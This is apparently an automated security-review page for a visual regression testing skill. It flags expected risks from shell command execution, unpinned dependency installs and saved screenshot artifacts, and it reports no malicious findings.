Visual Qa
Security checks across static analysis, malware telemetry, and agentic risk
Overview
This appears to be a coherent visual regression testing skill; its main risks are expected local setup, optional server command execution, and saved screenshot artifacts.
This skill looks appropriate for visual regression testing. Before installing or using it, run dependency installs in a controlled environment, review any configured server command before execution, and treat generated screenshots/diffs as potentially sensitive project artifacts.
Static analysis
No static analysis findings were reported for this release.
VirusTotal
VirusTotal findings are pending for this skill version.
Risk analysis
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If you run the server option, the configured command can execute with your local user permissions.
The skill can start a local development server by executing a caller/config-provided command through the shell. This is expected for visual QA workflows, but it is still broad local command execution.
process = subprocess.Popen(
command,
shell=True,Only use the --server option or config server value with commands you trust, especially when running this in an unfamiliar repository.
Installing dependencies may download and run third-party package/browser code in your environment.
The skill documents manual installation of external Python packages and a Chromium browser download, while the registry metadata has no install spec or required binaries. This setup is purpose-aligned but not pinned or declared in install metadata.
pip install playwright pillow python -m playwright install chromium
Install dependencies in a project virtual environment or CI image you control, and pin versions if reproducible builds matter.
Screenshots and diff images can preserve sensitive UI, test data, or customer-like information in the project workspace.
The gate saves diff images to a persistent project directory when tests fail, and the capture workflow also writes screenshot baselines. These artifacts are expected for visual regression testing but may contain page content.
keep_diff_dir = '.visual-qa/diffs'
os.makedirs(keep_diff_dir, exist_ok=True)
subprocess.run(['cp', '-r', f'{diff_dir}/.', keep_diff_dir])Avoid capturing sensitive sessions or production data, and add .visual-qa outputs to .gitignore unless you intentionally want to commit them.